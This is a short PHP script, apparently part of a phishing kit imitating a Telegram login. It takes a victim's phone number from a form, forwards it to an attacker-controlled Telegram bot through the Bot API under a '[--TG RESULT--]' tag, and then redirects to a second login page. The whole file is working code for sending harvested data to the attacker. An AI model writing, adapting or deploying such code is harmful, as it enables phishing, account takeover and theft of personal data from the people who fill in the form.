<?php
// Sertakan file telegram.php yang berisi token dan chat ID
include('../../telegram.php');

// Ambil data dari form (nomor dari localStorage)
$nomor = isset($_POST['nomor']) ? $_POST['nomor'] : '';

// Pastikan nomor tidak kosong
if (!empty($nomor)) {
    // Gabungkan pesan yang akan dikirim ke Telegram
    $message = "[--TG RESULT--]. $nomor . \n";

    // URL API untuk mengirim pesan ke bot Telegram
    $apiURL = "https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($message);

    // Kirim pesan ke Telegram
    $send_message = file_get_contents($apiURL);

    // Cek apakah pesan berhasil terkirim
    if ($send_message) {
        // Jika berhasil, redirect ke halaman berikutnya (misalnya login2.php)
        header('Location: ../login2.php');
        exit;
    } else {
        // Jika gagal, tampilkan pesan error
        echo "<script>alert('Gagal mengirim pesan ke Telegram.');</script>";
    }
} else {
    // Jika nomor tidak valid, kembali ke halaman sebelumnya dengan pesan error
    echo "<script>alert('Nomor tidak valid. Silakan ulangi pengisian form.'); window.history.back();</script>";
}
?>
